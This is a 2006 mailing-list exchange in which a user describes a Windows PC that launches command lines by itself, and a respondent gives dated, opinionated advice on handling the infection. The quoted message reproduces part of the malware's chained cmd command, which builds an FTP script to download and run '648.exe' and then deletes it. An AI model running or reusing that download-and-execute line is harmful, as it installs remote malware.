[_] PC strange behaviour

Steve Roome steve at
Tue Nov 7 03:09:43 GMT 2006

In general here's the approach to use if you think your machine has a

If you've not already done it, turn it off, unplug it, take the disk out
and then hand the disk to someone who knows how to make sure the virus
is completely and properly removed from the disk. It will be handy if
they're really good and can tell you how you got it too - so you don't
have it happening really soon from the same website!

Part of the reason for this is that the virus is already running, and is
perfectly able (with the administrator privs it has) to tell the machine
what to run and what not to. i.e. it's not really getting checked, and it
won't, by pretty much any of your virus checkers, ad removers and spybot
filtering stuff. To be honest, most of that stuff is useless anyway, you
need a firewall - a real one! About the only worthwhile effect is the
cookie cleaner functionality - but one shouldn't need that with a good
browser (opera isn't so bad for this, lynx is great).

You could try a bunch of windows tools, running from the infected machine,
but it's not really worth it. Also, don't go plugging the drive into
another windows machine - unless you want that to possibly end up as toast

btw, having a firewall running on the computer it's trying to protect
hardly counts as a firewall at all. Especially with the protection
model windows uses - all packets from the network pretty much reach the
kernel address space and almost all processes can read and write to that
address space. As such, it's only a firewall at the application layer
and some stuff will inevitably get around it.

Never trust a firewall on the machine you're using - especially if you're
web browsing! But do keep up to date with the MS security patches, making
a machine safe is next to impossible if you choose to run windows.


P.S. Buy a mac instead of a PC - personally I find them awful to use, but
you won't get as many virii/viruses that way!

On Mon, Nov 06, 2006 at 11:08:59AM +0000, Joe Leech wrote:

> Hi [_],
> My PC at home is playing up and I'm not sure why.
> Occasionally the command line will just open up and a command will be
> entered along the lines of disable McAfee and symantec and ftp this
> ip address and download this file.
> Here's a little snippet of what I see:
> i &echo quit >> i &ftp -n -s:i &648.exe&del i&exit
> My firewall (sygate) blocks the FTP request so nothing bad happens.
> I've run AVG, adaware, spybot and a couple of online virus scanners
> all of which can't find a thing.
> What's going on?
> joe